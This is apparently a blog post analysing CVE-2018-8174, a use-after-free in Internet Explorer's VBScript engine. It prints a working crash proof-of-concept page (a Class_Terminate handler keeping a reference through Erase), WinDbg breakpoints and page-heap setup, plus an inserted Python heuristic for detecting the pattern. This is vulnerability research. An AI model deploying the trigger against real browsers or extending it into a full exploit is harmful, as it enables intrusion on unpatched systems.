[IE][VBS][UAF][CVE-2018-8174]
阿新 • Published: 2018-07-16
Environment: Win7 + IE9
Breakpoints:
1. Crash POC
```html
<html lang="en">
<body>
<script language="vbscript">
Dim array_a
Dim array_b(1)

Class Trigger
    ' Runs when the Trigger instance is destroyed (here: during Erase array_a)
    Private Sub Class_Terminate()
        Set array_b(0) = array_a(1)   ' keep a second reference to the object being freed
        array_a(1) = 1
    End Sub
End Class

Sub UAF
    ReDim array_a(1)
    Set array_a(1) = New Trigger
    Erase array_a                     ' frees array_a and the Trigger object it holds
End Sub

Sub TriggerVuln
    array_b(0) = 0                    ' touches the dangling reference
End Sub

Sub StartExploit
    UAF
    TriggerVuln
End Sub

StartExploit
</script>
</body>
</html>
```
```
C:\Program Files\Debugging Tools for Windows (x86)>gflags.exe /i iexplore.exe +hpa
Current Registry Settings for iexplore.exe executable are: 02000000
    hpa - Enable page heap
```
Add logging to verify the hypothesis further
```html
<html lang="en">
<body>
<script language="vbscript">
Dim array_a
Dim array_b(1)

Class Trigger
    Private Sub Class_Terminate()
        Set array_b(0) = array_a(1)
        array_a(1) = 1
        IsEmpty(array_b)              ' log point: breakpoint on vbscript!VbsIsEmpty
    End Sub
End Class

Sub UAF
    ReDim array_a(1)
    Set array_a(1) = New Trigger
    IsEmpty(array_a)                  ' log point
    Erase array_a
    IsEmpty("Erase Finish")           ' log point
End Sub

Sub TriggerVuln
    array_b(0) = 0
End Sub

Sub StartExploit
    UAF
    TriggerVuln
End Sub

StartExploit
</script>
</body>
</html>
```
At this point you can see that array_a(1) already points to the Trigger object; continue debugging. (WinDbg hung when I got here, so I had to kill it and debug again; the new array_a address is 0x081affe8.)
By the time execution reaches the third IsEmpty, array_a and the Trigger object have already been freed, but array_b still holds a reference to the Trigger object.
The subsequent array_b(0) = 0 then accesses the freed memory, triggering the UAF vulnerability.
Clearly, the Trigger object is freed along with Erase array_a while array_b still references it. Let's look at where the error occurs.
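As an added example (not code from the original post), here is a small Python heuristic that flags the pattern just described in a page's VBScript: a Class_Terminate that copies an object reference out of an array element while the same script also Erases or ReDims that array. The two sample inputs are constructed, and the regexes are a heuristic, not a VBScript parser.

```python
import re

# Constructed sample that mirrors the shape of the crash PoC analysed above (not the page's file).
POC = """<script language="vbscript">
Dim array_a
Dim array_b(1)
Class Trigger
    Private Sub Class_Terminate()
        Set array_b(0) = array_a(1)
        array_a(1) = 1
    End Sub
End Class
Sub UAF
    ReDim array_a(1)
    Set array_a(1) = New Trigger
    Erase array_a
End Sub
</script>"""

# Constructed benign sample: a destructor that copies no reference out of a freed array.
BENIGN = """<script language="vbscript">
Class Logger
    Private Sub Class_Terminate()
        MsgBox "done"
    End Sub
End Class
Dim a(1)
Erase a
</script>"""

SCRIPT_RE = re.compile(r'<script[^>]*vbscript[^>]*>(.*?)</script>', re.I | re.S)
CLASS_RE = re.compile(r'\bClass\s+(\w+)\b(.*?)\bEnd\s+Class\b', re.I | re.S)
TERM_RE = re.compile(r'\bSub\s+Class_Terminate\b(.*?)\bEnd\s+Sub\b', re.I | re.S)
# "Set dst(i) = src(j)": an object reference copied out of one array element into another
SET_ELEM_RE = re.compile(r'\bSet\s+(\w+)\s*\([^)]*\)\s*=\s*(\w+)\s*\([^)]*\)', re.I)
FREE_RE = re.compile(r'\b(?:Erase|ReDim(?:\s+Preserve)?)\s+(\w+)', re.I)

def find_uaf_pattern(html):
    """Return (class, source_array) pairs for every Class_Terminate that copies an
    element reference out of an array the same script also Erases or ReDims."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        freed = {name.lower() for name in FREE_RE.findall(script)}
        for cls, cls_body in CLASS_RE.findall(script):
            for term_body in TERM_RE.findall(cls_body):
                for _dst, src in SET_ELEM_RE.findall(term_body):
                    if src.lower() in freed:
                        findings.append((cls, src))
    return findings
```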
After reviewing the pseudocode, verify the hypothesis further by debugging
```
0:004> bl
 0 e 6b1e343d     0001 (0001)  0:**** vbscript!VbsErase
 1 e 6b1a5f1c     0001 (0001)  0:**** vbscript!VBScriptClass::Release
 2 e 6b1a583e     0001 (0001)  0:**** vbscript!VbsIsEmpty
```
Once inside vbscript!VBScriptClass::Release, disable the breakpoints above; otherwise single-stepping will break at places we don't want.